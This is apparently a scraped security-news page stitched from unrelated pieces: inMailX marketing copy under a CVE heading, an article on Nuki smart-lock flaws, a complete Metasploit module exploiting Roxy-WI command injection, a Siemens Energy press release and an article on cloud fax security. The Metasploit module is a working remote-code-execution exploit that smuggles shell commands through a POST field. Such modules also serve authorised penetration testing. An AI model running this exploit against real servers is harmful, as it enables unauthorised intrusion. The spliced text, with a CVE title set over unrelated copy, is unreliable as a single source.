 - Combine, bookmark and secure multiple attachments into a single PDF  
 - Password protect Word, Excel PowerPoint and PDF attachments  
 - Rename and Reorder email attachments 'on the fly'  
 - Compress and secure attachments into ZIP while composing emails  
 - Save paper by printing only the most recent email conversation threads  
 - Print email body and attachments selectively and simultaneously  
 - Schedule follow-up tasks/appointments when filing or sending emails  
 - Reduce repetitive typing and quickly compose standard emails with content manager  
 - File emails into records and document management systems, network or cloud repositories

Its user interface is simple and intuitive, and it has been designed to combine most common tasks, such as 'Send, File & Print', 'Close, File & Print' or 'Attachments Preview, Clean, PDF, Protect, Rename, Reorder', into simple one-click actions.  Digitus has developed several inMailX modules that can be purchased separately or bundled in two cost effective suites_, inMailX Standard_ and _inMailX Professional__._

> **inMailX Standard** includes the following modules**:**
> 
> *   _Attachment Manager  
>     _
> *   _Content Manager  
>     _
> *   __Print Manager  
>     __
> 
> **inMailX Professional** includes the following modules**:**
> 
> *   _Email Manager  
>     _
> *   _Attachment Manager  
>     _
> *   _Content Manager  
>     _
> *   _Print Manager  
>     _
> *   _Time Manager  
>     _
> *   _Brand Manager  
>     _

**inMailX scales easily to meet the needs of any organisation, and it brings teams productivity to new levels.** 

**As new users are created, they automatically receive enhanced email management functionality, efficient attachments Preview, Clean, PDF, Protect, ZIP, Rename and Reorder tools, global quick text content, personalised email signatures and standardised corporate forms, so that they can immediately become productive.** 

**Integration with third party electronic documents and records management systems**

When used with its optional connectors for document/records management and file system integration, inMailX enhances Microsoft Outlook capabilities to file emails into third party document/records management systems, such as: iManage Work/Worksite, Micro Focus/HPE Content Manager, NetDocuments, SharePoint, Worldox, WebDAV (Oracle UCM, WebDAV Repositories, etc.), Cloud Stores or Network Folders (Box, Dropbox, GoogleDrive, OneDrive, MYOB Accountants Enterprise, MYOB Insolvency, APS Folders, etc.).

By integrating directly into Microsoft Outlook, inMailX allows staff to take control over managing their emails without losing any of the existing Outlook functionality. To find out more, click here.

**Save time, Reduce costs, Increase productivity**

With inMailX, organisations will ensure that their staff are able to maintain their sent and received emails organised, that email attachments can easily be previewed, cleaned, converted to PDF, reanmed and reordered, and that paper wastage is reduced by being able to truncate email printing and selectively print attachments.

In addition, organisations will improve their email branding by being able to centrally deploy and maintain standardised corporate email forms and signatures which are integrated Exchange Global Address List and Active Directory.

Since inMailX is extremely intuitive, it allows users to take advantage of its benefits with minimal training, and without delay. This translates into saving valuable time, reduced running costs, and increased productivity.

**Any organisation, regardless of its size, using Microsoft Outlook, will benefit from inMailX' High Return on Investment.**

**Contact us for a free inMailX demonstration, and discover the power of inMailX today!**

  
inMailX, inDocX, LawConnect, DigitusNet, iDigitus, Digitus are registered trademarks of Digitus Information Systems Pty Ltd in Australia and in some other countries. All third-party trademarks are the property of their respective owners.

CVE-2022-27105: inMailX | Digitus Information Systems

By Deeba Ahmed
Researchers have identified as many as eleven critical vulnerabilities in different versions of Nuki Smart Locks. The IT…
This is a post from HackRead.com Read the original post: Critical Vulnerabilities Exposed Nuki Smart Locks to a Plethora of Attack Options

****Researchers have identified as many as eleven critical vulnerabilities in different versions of Nuki Smart Locks.****

The IT security researchers at Manchester, England-based NCC Group have released a technical advisory explaining how Nuki Smart Locks were vulnerable to a plethora of attack possibilities.

It is worth noting that Nuki Home Solutions is a Graz, Austria-based supplier of smart home solutions in Europe. Here is a detailed overview of the eleven flaws in Nuki’s locks.

**Lack of Certificate Validation on TLS Communications**

This flaw is tracked as CVE-2022-32509 and affects Nuki Smart Lock version 3.0. As per the NCC Group research, the company didn’t implement SSL/TLS certificate validation on its Smart lock and Bridge devices. Without SSL/TLS certificate validation, attackers can perform man-in-the-middle attacks and access network traffic sent through an encrypted channel.

**Stack Buffer Overflow Parsing JSON Responses**

Tracked as CVE-2022-32504, this vulnerability affects Nuki Smart Lock 3.0. The issue can allow an attacker to get arbitrary code execution privilege on the device. The flaw is found in the code that implements the JSON objects parsing received from the SSE WebSocket, leading to a stack buffer overflow.

**Stack Buffer Overflow Parsing HTTP Parameters**

As per NCC Group’s technical writeup, the code responsible for overseeing the HTTP API parameter parsing logic causes a stack buffer overflow. It could be exploited to perform arbitrary code execution. This flaw is tracked as CVE-2022-32502 and was discovered in Nuki Bridge version 1.

**Broken Access Controls in the BLE Protocol**

The flaw is tracked as CVE-2022-32507 and affects Nuki Smart Lock 3.0. Research revealed that inadequate access control measures were used in the Bluetooth Low Energy Nuki API implementation, which could allow users to send out high-privilege commands to the Keyturner without being authorized for it.

1.  The Most Commonly Hacked Smart Home Tech
2.  Hackers can unlock a smartphone with fingerprints on glass of water
3.  Smart Lock vulnerability can give hackers full access to Wi-Fi network
4.  Hackers can clone your lock keys by recording clicks from smartphone
5.  Vulnerable smart alarms allowed hackers to track & turn off car engine

**TAG Exposed via Test Points**

This flaw is classified as CVE-2022-32503 and impacts Nuki Keypad. The TAG Exposed issue exposed the JTAG hardware interfaces on the affected devices.

Exploiting this flaw can allow an attacker to use the JTAG boundary scan feature to control code execution on the processor, debug the firmware, and read/alter the internal/external flash memory content. However, the attacker must have physical access to the circuit board to exploit the scan feature.

**Sensitive Information Sent Over an Unencrypted Channel**

This vulnerability is assigned CVE-2022-32510 and impacts Nuki Bridge version 1. The Bridge exposes the HTTP API using an unencrypted channel to access an administrative interface. The attacker can passively gather communication between the HTTP API and a client after accessing any device connected to the local network. A malicious actor can conveniently impersonate a legit user and access the full set of API endpoints.

**WD Interfaces Exposed via Test Points**

Tracked as CVE-2022-32506, the flaw exposed SWD hardware interfaces and was identified in Nuki smart lock 3.0. The attacker can use the SWD debug feature after having physical access to the circuit board, control the processor’s code execution, and debug the firmware.

SWD test points exposed (Image: Ncc Group)

**Denial of Service via Unauthenticated HTTP API Messages**

This flaw is classified as CVE-2022-32508 and impacts Nuki Bridge version 1. The flaw made devices vulnerable to denial of service (DoS) attacks if the attacker used specially crafted HTTP packets. Thus, impacting access to the Bridge and rendering the device unstable.

**Denial of Service via Unauthenticated BLE packets**

Tracked as CVE-2022-32505, this flaw made the impacted devices vulnerable to DoS attack through specially crafted Bluetooth Low energy packets. This could affect Keyturner’s availability and make the device unstable. Most BLE characteristics were found to be vulnerable to this issue.

**Insecure Invite Keys Implementation**

This flaw impacts the Nuki Smart Lock app version 2.22.5.5 (661). The invite token created for identifying a user during an invitation process is used to encrypt/decrypt the invite keys on the Nuki servers. A threat actor can easily take full control of the servers through this flaw and leak sensitive data.

**Opener Name Could Be Overwritten Without Authentication**

The Nuki Opener is impacted by this vulnerability that emerged from an insecure Opener Bluetooth Low energy implementation, allowing malicious actors to change the BLE device name. The device allowed an unauthenticated attacker to change the BLE device name.

**Current status**

The NCC Group informed Nuki about these flaws on 20th April 2022, and the company quickly responded. On 6th May 2022, Nuki contacted NCC Group regarding the progress on fixes. On 9th June 2022, patches were released for all vulnerabilities, after which NCC Group released a technical advisory.

Critical Vulnerabilities Exposed Nuki Smart Locks to a Plethora of Attack Options

This Metasploit module exploits an unauthenticated command injection vulnerability in Roxy-WI versions prior to 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in Roxy-WI          prior to version 6.1.1.0. Successful exploitation results in remote code execution          under the context of the web server user.          Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.        },        'License' => MSF_LICENSE,        'Author' => [          'Nuri Çilengir <nuri[at]prodaft.com>', # Author & Metasploit module        ],        'References' => [          ['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory          ['URL', 'https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532'], # Additional Information          ['URL', 'https://github.com/hap-wi/roxy-wi/commit/82666df1e60c45dd6aa533b01a392f015d32f755'], # Patch          ['CVE', '2022-31137']        ],        'DefaultOptions' => {          'SSL' => true,          'WfsDelay' => 25        },        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Unix (In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :in_memory            }          ],          [            'Linux (Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :dropper            }          ]        ],        'CmdStagerFlavor' => ['printf'],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2022-07-06',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(443),        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])      ]    )  end  def execute_command(cmd, _opts = {})    return send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'app', 'options.py'),        'vars_post' => {          'serv' => '127.0.0.1',          'ipbackend' => "\"; #{cmd} ;#",          'alert_consumer' => Rex::Text.rand_text_alpha_lower(7),          'backend_server' => '127.0.0.1'        }      }, 10    )  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT    return nil  end  def check    print_status("Checking if #{peer} is vulnerable!")    res = execute_command('id')    return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res    if res.code == 200 && res.body =~ /uid=\d+$.+$/      print_status("#{peer} is vulnerable!")      return CheckCode::Vulnerable('The device responded to exploitation with a 200 OK and test command successfully executed.')    elsif res.code == 200      return CheckCode::Unknown('The target did respond 200 OK response however it did not contain the expected payload.')    else      return CheckCode::Safe("The #{peer} did not respond a 200 OK response and the expected response, meaning its not vulnerable.")    end  end  def exploit    print_status('Exploiting...')    case target['Type']    when :in_memory      execute_command(payload.encoded)    when :dropper      execute_cmdstager    end  endend

Roxy-WI Remote Command Execution

Company joins AWS Partner Network to provide customers with industrial cybersecurity solution to ensure reliable electricity and fuel supplies.

*   Siemens Energy joins the AWS Partner Network as a Technology Partner to provide customers with industrial cybersecurity, analytics, and storage solutions
*   Siemens Energy’s AI-driven Managed Detection & Response (MDR) solution is a first-of-a-kind security offering available in AWS Marketplace built for energy and utilities, by an integrated energy technology company focused across the entire energy value chain
*   MDR’s monitoring and detection insights provide scalable protection against disruptive cyberattacks in the energy sector using innovative artificial intelligence

Siemens Energy Inc, one of the world’s leading energy technology companies, announces it is joining the Amazon Web Services (AWS) Partner Network (APN), a global community of partners that leverage programs, expertise, and resources to build, market, and sell customer offerings.

This expanded relationship includes listing Siemens Energy’s Managed Detection and Response (MDR) industrial cyber security solution in AWS Marketplace, a digital catalog that makes it easy for customers to find, compare, and immediately start using the software and services that run on AWS. This MDR security offering in AWS Marketplace is built for energy and utilities, by an integrated energy technology company focused across the entire energy value chain. As energy companies strive to protect physical infrastructure from escalating cyber threats, Siemens Energy’s MDR on AWS reduces the cost and technical barriers to achieving strong, fast, comprehensive cyber defense.

Expanding access to state-of-the-art cybersecurity is essential to ensuring reliable electricity and fuel supplies. Cyber risks to infrastructure are escalating amid the ongoing transition toward renewable and low-carbon energy sources and the accompanying expansion of digital devices in the energy sector. Siemens Energy’s MDR will help customers leverage analytics to secure their infrastructure while reducing costs, improving efficacy, and reducing emissions.

Siemens Energy’s industrial monitoring and detection solution defends critical infrastructure against cyberattacks, helping protect communities around the world from supply chain disruptions. AWS’s capabilities allow MDR’s technology to quickly collect and analyze large volumes of data to monitor for cyber threats, giving energy sector chief information security officers (CISOs) the power to detect and uncover attacks before they execute.

Secure cloud capabilities that can integrate digital applications and leverage sensitive data – such as real-time monitoring and detection – add an important and cost-effective tool to the defensive arsenal for CISOs and industrial security analysts.

“The energy transition relies on seamlessly connecting physical assets with digital technologies to foster innovation, reduce emissions, and improve efficiency, but this future depends on strong cybersecurity across the whole supply chain,” said Leo Simonovich, Vice President and Global Head of Industrial Cyber, Siemens Energy. “Siemens Energy’s AI-driven industrial cyber monitoring and detection platform is purpose-built to help CISOs identify, prevent, and mitigate cyber threats to the energy sector’s digital business model. Energy companies at every scale can now access and integrate advanced cyber threat detection across their operating environment, leveraging AWS’s secure cloud platform to build and defend the foundation of a digital energy ecosystem.”

Siemens Energy Takes Next Step to Protect Critical Infrastructure

The fax is dead. Long live the online fax? A new study suggests many healthcare professionals believe that flaws in today’s web security landscape are prompting a return to what’s been deemed an “extr

The fax is dead. Long live the online fax?

A new study suggests many healthcare professionals believe that flaws in today’s web security landscape are prompting a return to what’s been deemed an “extremely” secure medium: fax.

Published earlier this month, eFax research surveyed 1,000 IT and business decision-makers in the UK and Europe.

According to the report (PDF), 62% of respondents in the healthcare sector said that security was the major reason for a “migration” to cloud-based fax systems, and 21% of those surveyed believe that digital fax systems are “extremely” secure.

**What is ‘cloud fax’?**

Cloud faxing removes the need for on-premise equipment on both sides of a transmission. The gist is that users can send a fax quickly, via an online service, to be viewed and/or printed by the recipient.

Among fax users in healthcare, 37% of respondents said they use “cloud-based fax” systems, while 21% use both cloud and traditional faxing.

The research is the work of eFax, a company that uses the slogan: “The fast & easy way to send and receive faxes by email”.

It’s interesting, then, that the company’s own research says: “One of the main problems with email is its increasing vulnerability to interception, hacking, and fraud.”

“eFax is an internet fax service that eliminates the need for a fax machine, extra fax line, and all the associated expenses,” the company says. “Get a real local or toll-free fax number to send and receive faxes as email attachments. Online faxing is more reliable, secure, and convenient than analog fax machines.”

**Blurred lines**

When you send a test eFax ‘fax’, you receive an ‘incoming’ fax email with a PDF attached. Faxes can be sent to a phone number or online assignment number and can be accessed via email, the eFax portal, mobile app, or a standard fax machine.

Overall, a third of respondents (37%) said fax usage was likely to increase in the future – but 35% also said there might be a decrease.

However, while eFax appears to be trying to separate email and fax security, the line between what can be considered a fax message, or just an email, has been blurred.

Read more of the latest email security news

Traditional fax machines were considered secure in the past as they were ‘dumb’, internet connections were dial-up or nothing, and contained limited, analog functionality.

But the moment you connect a fax ‘number’ to a digital channel – whether this is an online portal accessed through a browser, email account, or app – there is always a risk of compromise.

When the study was published, Scott Wilson, vice president of sales and service at eFax, commented:

It’s clear that email is the established and widely accepted format for most communications, but it’s flawed and vulnerable to interception and hacking. Cloud faxing is more secure than email not least because fax infrastructure has limited exposure to the internet and internet-connected devices.

**‘Encryption is king’**

Using a fax number to send a message rather than an email address might not be traceable to a specific company department or user, and so could mitigate the risk of targeted attacks.

Sending a document directly to a physical fax machine, too, might have some perceived advantages – but it does not take away the risks of its underlying, digital infrastructure.

When asked by _The Daily Swig_ how eFax differs from standard email, and what security or encryption measures are in place, the eFax did not respond. (The firm’s help center, however, does mention TLS and some form of encryption.)

Simon Mullis, CTO of Venari Security, commented: “Cloud-based fax systems are a resourceful way to ensure the secure communication of confidential information, but for most encryption will be king.

“With 25% of healthcare organizations saying they rely on email encrypted software, it’s important to recognize the role of end-to-end encryption in ensuring higher levels of security and privacy, while also remaining compliant of regulations like GDPR.”

Cloud fax services can be quicker, cheaper, and more convenient for businesses that don’t want to rely on analog lines. However, the jury’s out on whether digital ‘faxes’ are any more, or less, secure than email – especially when both would depend on the implementation of basic security measures such as end-to-end encryption.

**YOU MIGHT ALSO LIKE** Zero-day flaws in GPS tracker pose surveillance, fuel cut-off risks to vehicles

Tag

#ssl